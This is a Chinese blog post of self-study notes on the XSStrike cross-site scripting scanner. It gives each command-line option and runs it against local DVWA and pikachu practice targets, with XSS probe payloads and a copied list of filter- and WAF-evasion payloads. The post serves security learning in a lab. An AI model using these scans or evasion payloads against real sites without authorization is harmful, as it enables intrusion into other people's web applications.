网络安全-XSStrike中文手册(自学笔记)

目录

安装

克隆

安装模块

环境要求

python版本

操作系统

选项

帮助

添加目标url

单个

GET方法

POST方法

从文件

测试url路径组件

POST数据为json格式

爬取

默认

爬取深度

从文件读取payloads

查找隐藏参数

时间问题

线程数

超时

延迟

headers

盲注

有效负载编码

模糊测试

日志显示最低级别

跳过确认提示

跳过Dom扫描

更新


是我打开方式不对吗?什么玩意呀(分析在最后)

安装

克隆

git clone https://github.com/s0md3v/XSStrike.git

安装模块

pip3 install -r requirements.txt

环境要求

python版本

>=3.4

操作系统

Linux (Arch, Debian, Ubnutu), Termux, Windows (7 & 10), Mac

选项

选项

选项作用
-h, --help显示帮助信息并退出
-u, --url目标url
–datapost方法的数据
-f, --file从文件读取payloads
-t, --threads线程数量
-l, --level爬取级别
-t, --encodepayload采取的编码
–jsonjson格式的数据
–path指定路径注入
–seeds从文件加载url
–fuzzerfuzz工具
–update更新
–timeout超时时间
–params寻找参数
–crawl爬取
–proxy使用代理
–blind爬取时盲注
–skip跳过确认等
–skip-dom跳过dom检查
–headers添加headers
-d, --delay两次请求之间的延迟

帮助

python xsstrike.py -h

添加目标url

单个

GET方法

选项:-u或–url

python xsstrike.py -u "http://example.com/search.php?q=query"

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert('xss')</script>"

POST方法

选项:–data

python xsstrike.py -u "http://example.com/search.php" --data "q=query"

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_s/" --data "txtName=test&mtxMessage=This+is+a+test+comment.&btnSign=Sign+Guestbook"

从文件

选项:–seeds 不使用-u选项

python xsstrike.py --seeds urls.txt

文件内容:

测试url路径组件

选项:–path

想要在URL路径中注入这样的有效负载 http://example.com/search/<payload>

python xsstrike.py -u "http://example.com/search/form/query" --path

POST数据为json格式

选项:–json

python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"}' --json

爬取

从目标网页开始搜寻目标并进行测试。

默认

选项:–crawl

python xsstrike.py -u "http://example.com/page.php" --crawl

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/" --crawl

1/1 是它找到的,连个空格都不加,不太成熟。

爬取深度

选项-l或–level 默认为2

python xsstrike.py -u "http://example.com/page.php" --crawl -l 3

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/" --crawl -l 3

从文件读取payloads

选项:-f或–file

python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=''" -f payloads.txt

测试完毕,不给结果???

查找隐藏参数

选项: --params

python xsstrike.py -u "http://example.com/page.php" --params

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/" --params

这个小东西是针不戳呢:),文章我都写不下去了,这和sqlmap差远了呀!!!

时间问题

线程数

选项: -t--threads,默认: 2

python xsstrike.py -u "http://example.com" -t 10 --crawl -l 3

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/" -t 3 --crawl -l 3

超时

选项: --timeout, 默认: 7

python xsstrike.py -u "http://example.com/page.php?q=query" --timeout=4

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --timeout=3

延迟

两个请求之间的延迟

选项: -d--delay,默认: 0

python xsstrike.py -u "http://example.com/page.php?q=query" -d 2

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" -d 2

headers

选项: --headers 使用\n分隔

python xsstrike.py -u http://example.com/page.php?q=query --headers "Accept-Language: en-US\nCookie: null"

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --headers "Cookie:security=low; csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=h9u1rmfie6ck34qsa2890777o1"

真是棒棒的,我都忍不住抓包了!!!

大兄弟???Cookie呢???WTF

前面也就算了,应该是Cookie的问题,做到这里我心态炸了,这就GitHub第一XSS注入神器???

盲注

选项: --blind

在爬取时使用此选项,XSStrike注入定义在core/config.py中的盲注payloads到每个HTML表单的每个参数。

core/config.py中的payloads

python xsstrike.py -u "http://example.com/page.php?q=query" --crawl --blind

payloads = ( # Payloads for filter & WAF evasion
‘\’“<Html Onmouseover=(confirm)()//’
‘<imG/sRc=l oNerrOr=(prompt)() x>’,
‘ <img src=x oNERror=(prompt)`` x>’,
‘’,
’,
'<svg/x=”>“/οnlοad=confirm()//',
‘<svg%0Aοnlοad=%09((pro\u006dpt))()//’,
‘<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>’,

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --crawl --blind

有效负载编码

选项: -e--encode

XSStrike可以按需编码有效负载。目前仅支持base64。

python xsstri``ke.py -u "http://example.com/page.php?q=query" -e base64

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" -e base64

模糊测试

选项: --fuzzer

该模糊器旨在测试过滤器和Web应用程序防火墙。

python xsstrike.py -u "http://example.com/search.php?q=query" --fuzzer

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --fuzzer

日志显示最低级别

选项(控制台): --console-log-level,默认:INFO

python xsstrike.py -u "http://example.com/search.php?q=query" --console-log-level WARNING

选项(文件:--file-log-level,默认:None

python xsstrike.py -u "http://example.com/search.php?q=query" --console-log-level DEBUG

选项(配合--file-log-level): --log-file,默认: xsstrike.log

python xsstrike.py -u "http://example.com/search.php?q=query" --file-log-level INFO --log-file output.log

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --crawl --blind --headers "Cookie:security=low; csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=h9u1rmfie6ck34qsa2890777o1" --file-log-level INFO

这我自己都能发现。。。浪费时间,回宿舍睡觉了。。。

继续搞。。。没准哪天可以了呢

跳过确认提示

选项:–skip

如果希望XSStrike发现了可以工作的payload后继续扫描,而不询问,则可以使用此选项。它也将跳过POC的生成。

python xsstrike.py -u "http://example.com/search.php?q=query" --skip

python xsstrike.py -u "127.0.0.1/dvwa/vulnerabilities/xss_r/?name=s" --skip

跳过Dom扫描

选项:–skip-dom

如果确定了不是dom型,为了节省时间,可以跳过dom扫描。

python xsstrike.py -u "http://example.com/search.php?q=query" --skip-dom

python xsstrike.py -u "127.0.0.1/dvwa/vulnerabilities/xss_r/?name=s" --skip-dom

确实没有check dom

更新

选项:–update

python xsstrike.py --update

分析(DVWA不行)

通过上面,大家也看到了我的很多抱怨。看来应该是dvwa的cookie问题,这个软件在cookie这个方面似乎做的不好。

我又试了靶机pikachu,是可以的。

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=q&submit=submit" --skip-dom

有时间使用XSStrike写一下pikachu的xss注入。

------------------------20201027更新------------------------------

各位,是我的问题,没有好好看官方文档,–headers里面关键字及冒号后面需要一个空格,本文上面的内容我就不改了,实战部分请看下面的文章,当然XSStrike还有点小问题也在下文。

网络安全-靶机pikachu之xss注入与代码分析(XSStrike实战)

从靠劳力赚钱转变成靠脑力赚钱,想入门网络安全的小白肯定想知道如何学好?

👉[[[CSDN大礼包:《黑客&网络安全入门&进阶学习资源》免费分享]]]安全链接,放心点击

一、网安学习成长路线图

Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。(全套教程文末领取哈)
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述
这份完整版的学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值